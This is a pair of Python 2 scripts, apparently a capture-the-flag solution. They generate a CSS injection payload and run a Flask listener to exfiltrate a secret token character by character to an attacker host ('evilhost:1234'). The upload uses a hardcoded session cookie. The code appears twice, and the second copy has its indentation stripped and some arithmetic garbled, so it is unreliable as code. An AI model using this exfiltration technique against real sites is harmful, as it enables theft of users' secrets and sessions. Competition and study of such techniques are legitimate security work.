vladvis/gen_css.py

## gen_css.py
import time
import requests

host = 'evilhost:1234'

start_template = 'input.sgn[value^="%02x"]{content:url(http://'+host+'/s/%02x);}'
triple_template = 'input.sgn[value*="%03x"]~button{--p%s:url(http://'+host+'/q/%03x);}'
timestamp_template = 'input.timestamp[value="%s"]{background:url(http://'+host+'/t/%s);}'

frames = '''button{animation:l1 35s;}
@keyframes l1{%s}'''

lines1 = []
lines2 = []

for i in xrange(1024):
    lines1.append('%s%%{content:var(--p%s);list-style-image:var(--p%s);border-image:var(--p%s);background-image:var(--p%s)}'%(i*0.08, i, i+1024, i+1024*2, i+1024*3))


frames = frames%('\n'.join(lines1))#, '\n'.join(lines2))

start_time = int(time.time())

css = []

for i in xrange(start_time, start_time+300):
    css.append(timestamp_template%(i, i))

for i in xrange(256):
    css.append(start_template%(i, i))

for i in xrange(4096):
    css.append(triple_template%(i, i, i))

css = '\n'.join(css) + '\n' + frames
print len(css)

print requests.post('https://ugly-website.web.jctf.pro/upload_css', files={'file': css}, cookies={'connect.sid': 's%3AUHWeBRChwL8RHqmvMZYOECT0O7vDJI4E.v5goWO%2Bvku0BFEpgqxVvqoB0POnXUdpCLEnTDudmJvE'}).content

## ugliest.py
#!/usr/bin/python2
from flask import Flask, redirect, url_for, render_template, request
from uuid import uuid4
app = Flask(__name__)

import copy
import requests


triples = set()
start = None
timestamp = None

def try_secret(s):
    print requests.get('https://ugly-website.web.jctf.pro/api/secret?sgn=%s&timestamp=%s&user_id=%s'%(s, timestamp, 1)).content

def restore(s, triples):
    if len(triples) == 0:
        try_secret(s)
    for i in xrange(len(triples)):
        if triples[i][:2] == s[-2:]:
            res = s + triples[i][-1]
            loc_triples = copy.copy(triples)
            loc_triples.pop(i)
            restore(res, loc_triples)

def calc():
    restore(start, list(triples))

@app.route("/q/<trp>")
def get_triple(trp):
    triples.add(trp)
    print len(triples)
    if len(triples) == 62 and start and timestamp:
        calc()
    return 'OK'

@app.route("/t/<timestamp_>")
def get_timestamp(timestamp_):
    global timestamp
    timestamp = int(timestamp_)
    if len(triples) == 62 and start and timestamp:
        calc()
    return 'OK'

@app.route("/s/<start_>")
def get_start(start_):
    global start
    start = start_
    if len(triples) == 62 and start and timestamp:
        calc()
    return 'OK'

if __name__ == "__main__":
    app.run(host='0.0.0.0', port=1234, threaded=True)
	import time
	import requests

	host = 'evilhost:1234'

	start_template = 'input.sgn[value^="%02x"]{content:url(http://'+host+'/s/%02x);}'
	triple_template = 'input.sgn[value*="%03x"]~button{--p%s:url(http://'+host+'/q/%03x);}'
	timestamp_template = 'input.timestamp[value="%s"]{background:url(http://'+host+'/t/%s);}'

	frames = '''button{animation:l1 35s;}
	@keyframes l1{%s}'''

	lines1 = []
	lines2 = []

	for i in xrange(1024):
	lines1.append('%s%%{content:var(--p%s);list-style-image:var(--p%s);border-image:var(--p%s);background-image:var(--p%s)}'%(i0.08, i, i+1024, i+10242, i+1024*3))


	frames = frames%('\n'.join(lines1))#, '\n'.join(lines2))

	start_time = int(time.time())

	css = []

	for i in xrange(start_time, start_time+300):
	css.append(timestamp_template%(i, i))

	for i in xrange(256):
	css.append(start_template%(i, i))

	for i in xrange(4096):
	css.append(triple_template%(i, i, i))

	css = '\n'.join(css) + '\n' + frames
	print len(css)

	print requests.post('https://ugly-website.web.jctf.pro/upload_css', files={'file': css}, cookies={'connect.sid': 's%3AUHWeBRChwL8RHqmvMZYOECT0O7vDJI4E.v5goWO%2Bvku0BFEpgqxVvqoB0POnXUdpCLEnTDudmJvE'}).content
	#!/usr/bin/python2
	from flask import Flask, redirect, url_for, render_template, request
	from uuid import uuid4
	app = Flask(__name__)

	import copy
	import requests


	triples = set()
	start = None
	timestamp = None

	def try_secret(s):
	print requests.get('https://ugly-website.web.jctf.pro/api/secret?sgn=%s&timestamp=%s&user_id=%s'%(s, timestamp, 1)).content

	def restore(s, triples):
	if len(triples) == 0:
	try_secret(s)
	for i in xrange(len(triples)):
	if triples[i][:2] == s[-2:]:
	res = s + triples[i][-1]
	loc_triples = copy.copy(triples)
	loc_triples.pop(i)
	restore(res, loc_triples)

	def calc():
	restore(start, list(triples))

	@app.route("/q/<trp>")
	def get_triple(trp):
	triples.add(trp)
	print len(triples)
	if len(triples) == 62 and start and timestamp:
	calc()
	return 'OK'

	@app.route("/t/<timestamp_>")
	def get_timestamp(timestamp_):
	global timestamp
	timestamp = int(timestamp_)
	if len(triples) == 62 and start and timestamp:
	calc()
	return 'OK'

	@app.route("/s/<start_>")
	def get_start(start_):
	global start
	start = start_
	if len(triples) == 62 and start and timestamp:
	calc()
	return 'OK'

	if __name__ == "__main__":
	app.run(host='0.0.0.0', port=1234, threaded=True)